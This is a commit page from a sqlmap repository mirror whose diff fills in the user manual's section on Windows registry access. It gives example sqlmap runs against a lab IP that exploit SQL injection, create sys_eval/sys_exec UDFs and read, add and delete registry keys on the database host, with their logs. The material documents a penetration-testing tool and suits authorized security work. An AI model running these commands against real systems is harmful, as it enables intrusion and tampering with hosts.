sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

Generated new user's manual html and pdf

Browse Source
This commit is contained in:
Bernardo Damele 2010-03-13 22:07:08 +00:00
parent ee89709042
commit bfbf58b04e
2 changed files with 137 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

165
doc/README.html
View File

@ -5345,54 +5345,163 @@ meterpreter > exit
<H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">Windows registry access</A> <H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">Windows registry access</A>
</H2> </H2>
<P>It is possible to access Windows registry when the back-end
database management system is either MySQL, PostgreSQL or
Microsoft SQL Server, and when the underlying database layer
supports stacked SQL queries. Also, session user has to have
the needed privileges to access it.</P>
<H3>Read a Windows registry key value</H3> <H3>Read a Windows registry key value</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-read</CODE></P> <P>Option: <CODE>-</CODE><CODE>-reg-read</CODE></P>
<P>TODO</P> <P>Using this option you can read registry key values.</P>
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read
<H3>Write a Windows registry key value data</H3> [...]
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: PostgreSQL
[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:15] [INFO] detecting back-end DBMS version from its banner
[hh:mm:15] [INFO] retrieved: 8.4.2,
[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:23] [INFO] retrieved: 1
[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
[hh:mm:23] [INFO] testing if current user is DBA
[hh:mm:23] [INFO] retrieved: 1
[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:23] [INFO] retrieved: 0
[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:24] [INFO] retrieved: 0
[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file
which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion]
which registry key value do you want to read? [ProductName]
[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\ProductName'
[hh:mm:35] [INFO] retrieved: ProductName REG_SZ Microsoft Windows XP
Registry key value data: 'ProductName REG_SZ Microsoft Windows XP'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Write a Windows registry key value</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P> <P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P>
<P>TODO</P> <P>Using this option you can write registry key values.</P>
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add
<H3>Delete a Windows registry key value</H3> [...]
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: PostgreSQL
[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
[hh:mm:20] [INFO] retrieved: 8.4.2,
[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:29] [INFO] retrieved: 1
[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
[hh:mm:30] [INFO] testing if current user is DBA
[hh:mm:30] [INFO] retrieved: 1
[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:30] [INFO] retrieved: 0
[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
which registry key value do you want to write? Test
which registry key value data do you want to write? 1
which registry key value data-type is it? [REG_SZ] REG_DWORD
[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'
with data '1'. This will work only if the user running the database process has privileges
to modify the Windows registry.
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Delete a Windows registry key</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P> <P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P>
<P>TODO</P> <P>Using this option you can delete registry keys.</P>
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del
[...]
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: PostgreSQL
[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
[hh:mm:20] [INFO] retrieved: 8.4.2,
[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:29] [INFO] retrieved: 1
[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
[hh:mm:30] [INFO] testing if current user is DBA
[hh:mm:30] [INFO] retrieved: 1
[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:30] [INFO] retrieved: 0
[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
which registry key value do you want to delete? Test
are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\
sqlmap\Test? [y/N] y
[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'.
This will work only if the user running the database process has privileges to modify the
Windows registry.
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Windows registry key</H3> <H3>Auxiliary registry switches</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-key</CODE></P> <P>Options: <CODE>-</CODE><CODE>-reg-key</CODE>, <CODE>-</CODE><CODE>-reg-value</CODE>,
<CODE>-</CODE><CODE>-reg-data</CODE> and <CODE>-</CODE><CODE>-reg-type</CODE></P>
<P>TODO</P> <P>These switches can be used to provide data needed for proper running of
options <CODE>-</CODE><CODE>-reg-read</CODE>, <CODE>-</CODE><CODE>-reg-add</CODE> and
<CODE>-</CODE><CODE>-reg-del</CODE>. So, instead of providing registry key
information when asked, you can use them at command prompt as program
arguments.</P>
<P>With <CODE>-</CODE><CODE>-reg-key</CODE> option you specify used windows
registry key path, with <CODE>-</CODE><CODE>-reg-value</CODE> value item
name inside provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value
data, while with <CODE>-</CODE><CODE>-reg-type</CODE> option you specify
type of the value item.</P>
<H3>Windows registry key value</H3> <P>So, another way of running example from option
<CODE>-</CODE><CODE>-reg-add</CODE> could be:</P>
<P>Option: <CODE>-</CODE><CODE>-reg-value</CODE></P> <P>
<BLOCKQUOTE><CODE>
<P>TODO</P> <PRE>
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \
--reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1
<H3>Windows registry key value data</H3> </PRE>
</CODE></BLOCKQUOTE>
<P>Option: <CODE>-</CODE><CODE>-reg-data</CODE></P> </P>
<P>TODO</P>
<H3>Windows registry key value type</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-type</CODE></P>
<P>TODO</P>
<H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">Miscellaneous</A> <H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">Miscellaneous</A>
</H2> </H2>

BIN
doc/README.pdf
View File

Binary file not shown.